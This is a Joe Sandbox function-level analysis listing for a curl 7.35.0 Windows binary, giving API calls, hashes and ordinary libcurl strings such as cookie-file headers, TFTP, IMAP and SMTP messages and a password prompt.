Instruction ID: 56772e17b6c22710661a495368625de3f67483ec207fcf597b88d7438ec8a17b
Opcode Fuzzy Hash: d7bb0727c784b444670f8651550b0137c094002352c2e0eb81a84eec9f49f5a1
Instruction Fuzzy Hash: C85190B06087119FD710EF29D48426BFBE1BF89344F14D92FE88897315E739E8459B8A

Function 00422EC0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

curl_slist_free_all.CURL ref: 00423045

Part of subcall function 00422980: curl_slist_free_all.CURL(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,0041AD83), ref: 004229E3

Strings

## Fatal libcurl error, xrefs: 00422FF4
%s, xrefs: 00422FC4
WARNING: failed to save cookies in %s, xrefs: 00423016
# Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00422FA6

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_slist_free_all
String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$WARNING: failed to save cookies in %s
API String ID: 2048950981-1719790475
Opcode ID: 371b73e79cb2a9cc44f51ae64e1344d76a383490a67c595c6b3ea79fc1fee01c
Instruction ID: 835383e26f36951b0b3de1782b1f056e3e9cf1b866b5c590668f182c2be03118
Opcode Fuzzy Hash: 371b73e79cb2a9cc44f51ae64e1344d76a383490a67c595c6b3ea79fc1fee01c
Instruction Fuzzy Hash: A25105B03087119BC710EF26D28462BBBE4BF91748F41881EE9C48B316D7B9D885DB5B

Function 0040C110 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 104stringCOMMON

Download Yara Rule

APIs

_strdup.MSVCRT ref: 0040C122
strtok.MSVCRT ref: 0040C138
isalnum.MSVCRT ref: 0040C152
free.MSVCRT ref: 0040C171
free.MSVCRT ref: 0040C223

Strings

all, xrefs: 0040C197
-, xrefs: 0040C15F
+, xrefs: 0040C169
unrecognized protocol '%s', xrefs: 0040C1EF
=, xrefs: 0040C164
`]F, xrefs: 0040C19C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$_strdupisalnumstrtok
String ID: +$-$=$`]F$all$unrecognized protocol '%s'
API String ID: 3841849020-3816288408
Opcode ID: 7d00f2335fa59cbb4c92c3c858da817bdc144f2f9ce91aeff4d395673941f5d0
Instruction ID: 8e3478fa0fd2d8ec51ff4789cb1222c295ff4f53301338c6f9401e67512a7289
Opcode Fuzzy Hash: 7d00f2335fa59cbb4c92c3c858da817bdc144f2f9ce91aeff4d395673941f5d0
Instruction Fuzzy Hash: 3B314B70604300CBDB60AF69C9C472B77E4AB45744F58863FE884EF392E738D8418B5A

Function 004047B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

curl_version.CURL ref: 004047C0

Part of subcall function 00413040: curl_msnprintf.CURL ref: 00413093

curl_mprintf.CURL ref: 004047D0
curl_mprintf.CURL ref: 004047E9
curl_mprintf.CURL ref: 0040480A
puts.MSVCRT ref: 0040481C
curl_mprintf.CURL ref: 00404840
curl_mprintf.CURL ref: 00404868
puts.MSVCRT ref: 0040487C

Strings

curl 7.35.0 (i386-pc-win32) %s, xrefs: 004047C5
%s , xrefs: 00404803, 0040485D
Features: , xrefs: 00404837
Protocols: , xrefs: 004047E2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mprintf$puts$curl_msnprintfcurl_version
String ID: %s $Features: $Protocols: $curl 7.35.0 (i386-pc-win32) %s
API String ID: 3167950106-1279257989
Opcode ID: 2ac40a5f14fc8345886b56c266c09fa8c1647735b1dde2d8ede6b0d9d3cc116c
Instruction ID: 74afe7e997468abe566318ed1cd55434ae417481cc2a455f45ec2ba65bc6eace
Opcode Fuzzy Hash: 2ac40a5f14fc8345886b56c266c09fa8c1647735b1dde2d8ede6b0d9d3cc116c
Instruction Fuzzy Hash: F7316DB4A043009BD760DF55D48072AB7E1BBC4319F04896EE9845F356E378E880CB4A

Function 00433C40 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 242COMMON

Download Yara Rule

APIs

sendto.WS2_32 ref: 00433D59
sendto.WS2_32 ref: 00433E24

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

sendto.WS2_32 ref: 00433F1B

Strings

tftp_tx: internal error, event: %i, xrefs: 00433CCF
Timeout waiting for block %d ACK. Retries = %d, xrefs: 00433C7A
tftp_tx: giving up waiting for block %d ack, xrefs: 00433EC9
Received ACK for block %d, expecting %d, xrefs: 00433E9E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: sendto$curl_mvsnprintfstrlen
String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
API String ID: 3492162279-4197595102
Opcode ID: c7e027abb257a8a9bf823df0e7e39df6f09732d93929753c90750668ee5b8c1c
Instruction ID: 7510b12ea088e7f1a621b0215d977f1f2070eed8f93cbb710d53036e75c1299c
Opcode Fuzzy Hash: c7e027abb257a8a9bf823df0e7e39df6f09732d93929753c90750668ee5b8c1c
Instruction Fuzzy Hash: F3B1D7B55047109FCB41DF69C48469ABBE0FF88305F15896EEC888B356E738D984CB56

Function 004336B0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 220networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32 ref: 004337A0
time.MSVCRT ref: 004337BD
sendto.WS2_32 ref: 004338A9
sendto.WS2_32 ref: 004338F6
sendto.WS2_32 ref: 004339B4
time.MSVCRT ref: 004339E7
WSAGetLastError.WS2_32 ref: 00433910

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

Strings

Received last DATA packet block %d again., xrefs: 004339F7
Timeout waiting for block %d ACK. Retries = %d, xrefs: 004336EE
tftp_rx: internal error, xrefs: 00433821
Received unexpected DATA packet block %d, expecting block %d, xrefs: 0043380D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: sendto$time$ErrorLastcurl_mvsnprintfstrlen
String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
API String ID: 1675330530-1785996722
Opcode ID: a4f42b46235a6dcf0c58f380832293988cea2eff5454c186cf77002a14832c20
Instruction ID: 14fc0df957ba7c08825c5e4396fa5fde73c2a0983db36d5d195448223a9d1c99
Opcode Fuzzy Hash: a4f42b46235a6dcf0c58f380832293988cea2eff5454c186cf77002a14832c20
Instruction Fuzzy Hash: A7A1D7B5504341CFCB41DF69D48469ABBE0FF88315F1589AAEC888F346E738D948CB96

Function 0043B6C2 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 238COMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 0043B807

Part of subcall function 00410A80: strlen.MSVCRT ref: 00410A99

Strings

MAIL FROM:%s SIZE=%s, xrefs: 0043BA2F
%I64d, xrefs: 0043B8E4
MAIL FROM:%s, xrefs: 0043BA0A
MAIL FROM:%s AUTH=%s SIZE=%s, xrefs: 0043B91C
<%s>, xrefs: 0043B800
MAIL FROM:%s AUTH=%s, xrefs: 0043B966

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintfstrlen
String ID: %I64d$<%s>$MAIL FROM:%s$MAIL FROM:%s AUTH=%s$MAIL FROM:%s AUTH=%s SIZE=%s$MAIL FROM:%s SIZE=%s
API String ID: 1800188633-658513215
Opcode ID: e9fd8b71d168fdaadcc87ba036acaa6e639db04cdde454613a9ca86c3bcba39c
Instruction ID: 035a967a95c38e4332435042f38c92e4debdf9eaa9569e402071d8b7f795b58d
Opcode Fuzzy Hash: e9fd8b71d168fdaadcc87ba036acaa6e639db04cdde454613a9ca86c3bcba39c
Instruction Fuzzy Hash: C0A129B0A087058FD714EF25C48436BBBE4FF88344F15982EEA988B355D778D845DB8A

Function 00446C3C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

isprint.MSVCRT ref: 00446BBC

Strings

], xrefs: 00446C40

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: isprint
String ID: ]
API String ID: 3707773532-3352871620
Opcode ID: b60009d360a948aaa67cbb6f2a30e6af3d2c3e61590f5c36a6b04a26fcbf8629
Instruction ID: 07b554ba8ee8c6fb4469b5508f3dd4231476569abc699b31f0611eb63c3fa1a6
Opcode Fuzzy Hash: b60009d360a948aaa67cbb6f2a30e6af3d2c3e61590f5c36a6b04a26fcbf8629
Instruction Fuzzy Hash: 4851847154C3919BE7258F24D4883ABBBE1AF81344F19882FD8C9863A1D37C99C6C75B

Function 004051EC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00405202
_strdup.MSVCRT ref: 00405233
curl_easy_escape.CURL ref: 00405292
free.MSVCRT ref: 004052A4
strlen.MSVCRT ref: 004052BC
malloc.MSVCRT ref: 004052DB
curl_msnprintf.CURL ref: 00405324
curl_free.CURL ref: 00405337
curl_strequal.CURL ref: 004063CA
fclose.MSVCRT ref: 0040640E
_strdup.MSVCRT ref: 0040642E
strchr.MSVCRT ref: 00406462

Strings

=, xrefs: 004051F7
%.*s=%s, xrefs: 00405309

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupstrchr$curl_easy_escapecurl_freecurl_msnprintfcurl_strequalfclosefreemallocstrlen
String ID: %.*s=%s$=
API String ID: 3691759785-360899102
Opcode ID: 69853d834dcb055b8ccf1cc4ecef2498cb0d2f12f7f537bc8d4fd4c0a8907d1e
Instruction ID: 01361a9693c2ebd08c7ba2aae6941094d10f8b869e5abb1f0ac2bfd33e33634e
Opcode Fuzzy Hash: 69853d834dcb055b8ccf1cc4ecef2498cb0d2f12f7f537bc8d4fd4c0a8907d1e
Instruction Fuzzy Hash: ED31F2B0A087008FD714DF29C58061ABBE1AF88744F05892EE9C9DB361E778D844CF86

Function 00404EC3 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00404EF2

Part of subcall function 0044D260: _errno.MSVCRT ref: 0044D289

curl_msnprintf.CURL ref: 00404F51

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

free.MSVCRT ref: 00404F63
_strdup.MSVCRT ref: 00404F6F
free.MSVCRT ref: 00404FC2
_strdup.MSVCRT ref: 00404FDB

Strings

%I64d-, xrefs: 00404F32
, xrefs: 00404F3A
A specified range MUST include at least one dash (-). Appending one for you!, xrefs: 00404F03
Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain., xrefs: 00405F96

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfree$_errnocurl_msnprintfcurl_mvsnprintfstrchr
String ID: $%I64d-$A specified range MUST include at least one dash (-). Appending one for you!$Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain.
API String ID: 2599427379-2202343933
Opcode ID: 307554c76ade54e398e774b5d75f0b02970f37ccd08758fc82e841c29bfc07cd
Instruction ID: 388e291e5c79e3c9b9307f701fcfe45d65e2b06d43b217b46f6bfd699744d3d3
Opcode Fuzzy Hash: 307554c76ade54e398e774b5d75f0b02970f37ccd08758fc82e841c29bfc07cd
Instruction Fuzzy Hash: 86410DB06083859FD7209F25C58475BBBE1AFC5308F04892EE9D89B392D378D8448B5B

Function 00436439 Relevance: 17.0, APIs: 2, Strings: 9, Instructions: 460COMMON

Download Yara Rule

Strings

UID, xrefs: 0043658D
Cannot SELECT without a mailbox., xrefs: 00436AA9
SECTION, xrefs: 004365B0
/, xrefs: 0043668A
APPEND %s (\Seen) {%I64d}, xrefs: 00436A4E
UIDVALIDITY, xrefs: 0043656A
SELECT %s, xrefs: 0043692E
Cannot APPEND without a mailbox., xrefs: 00436AC2
Cannot APPEND with unknown input file size, xrefs: 00436A84

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: /$APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Cannot SELECT without a mailbox.$SECTION$SELECT %s$UID$UIDVALIDITY
API String ID: 0-3134553033
Opcode ID: 1aac796ead543f3eb4fe078d4c400dadb694a9bac369fd23839ca16794e5c510
Instruction ID: 4284dea46fabdbd06cf64d9b9e73f7e9d2d6b4bdb3e54d700929f4160655f9c9
Opcode Fuzzy Hash: 1aac796ead543f3eb4fe078d4c400dadb694a9bac369fd23839ca16794e5c510
Instruction Fuzzy Hash: A9124DB06087429FD710DF25C58472BBBE4BF8C748F06996EE8888B351D778E844DB4A

Function 0042F479 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 423COMMON

Download Yara Rule

Strings

/, xrefs: 0042F606
%s%s, xrefs: 0042F79C
Wildcard - Parsing started, xrefs: 0042FA75
Wildcard - START of "%s", xrefs: 0042F7F0
ftp_perform ends with SECONDARY: %d, xrefs: 0042F8D7
Wildcard - "%s" skipped by user, xrefs: 0042F983
@, xrefs: 0042FB33

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_easy_unescapestrlen$strrchr
String ID: %s%s$/$@$Wildcard - "%s" skipped by user$Wildcard - Parsing started$Wildcard - START of "%s"$ftp_perform ends with SECONDARY: %d
API String ID: 2819911110-2835369333
Opcode ID: ffee6e0f9c65bb469034823a3376732458c736d8d5098a691ec56108b90bd05a
Instruction ID: 483b83278de4fea433769579fe932832d9ba2b80d8972ccd39662a06e47beae2
Opcode Fuzzy Hash: ffee6e0f9c65bb469034823a3376732458c736d8d5098a691ec56108b90bd05a
Instruction Fuzzy Hash: B41225743087119FD704DF28D48476ABBE0FF84304F95867AE5988B355DB39E889CB8A

Function 00417140 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00423B20: strchr.MSVCRT ref: 00423B94

curl_msnprintf.CURL ref: 00417220
InitializeCriticalSection.KERNEL32 ref: 0041730E

Strings

D, xrefs: 00417225
getaddrinfo() failed for %s:%d; %s, xrefs: 00417461
init_resolve_thread() failed for %s; %s, xrefs: 00417405

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CriticalInitializeSectioncurl_msnprintfstrchr
String ID: D$getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
API String ID: 1593738649-1412717160
Opcode ID: a2f1f619c40b1320a622cb8490961823dfec1968938a0614d649c5ad4b8116ba
Instruction ID: 7b1666b9e01e98cd5ababb7462960885429d86bb3783b380478dd308758dfa1f
Opcode Fuzzy Hash: a2f1f619c40b1320a622cb8490961823dfec1968938a0614d649c5ad4b8116ba
Instruction Fuzzy Hash: 5BA1E1B4A043059FDB10DF69D484A9ABBF4BF48350F05882EE889DB311E778E984CF56

Function 0042D560 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 138COMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 0042D5EA

Strings

NLST, xrefs: 0042D6DE
LIST, xrefs: 0042D6E5
SIZE %s, xrefs: 0042D534
/, xrefs: 0042D6B4
%s%s%s, xrefs: 0042D5E3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf
String ID: %s%s%s$/$LIST$NLST$SIZE %s
API String ID: 3307269620-199929228
Opcode ID: 33a5c9e70ff88dadf24bbfe0a49e7a8503c534377a2c1ea995bd8560ed5512b4
Instruction ID: 734df1a372c21081bc9952fc55bccedc01b82714df1d70f9579037cf9857189c
Opcode Fuzzy Hash: 33a5c9e70ff88dadf24bbfe0a49e7a8503c534377a2c1ea995bd8560ed5512b4
Instruction Fuzzy Hash: 1441B3B0B043119BD7109F29A48836BB7E5AF84349F54443FE889CB316E779C884DB9A

Function 0040C300 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0040C326
strchr.MSVCRT ref: 0040C338
strlen.MSVCRT ref: 0040C371
curl_msnprintf.CURL ref: 0040C3B6
realloc.MSVCRT ref: 0040C415
memcpy.MSVCRT ref: 0040C443
curl_msnprintf.CURL ref: 0040C48F

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

Part of subcall function 00406F80: fputs.MSVCRT ref: 00406FA2
Part of subcall function 00406F80: _getch.MSVCRT ref: 00406FB7
Part of subcall function 00406F80: fputc.MSVCRT ref: 00406FF3

Strings

;, xrefs: 0040C32B
Enter %s password for user '%s':, xrefs: 0040C397, 0040C47B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
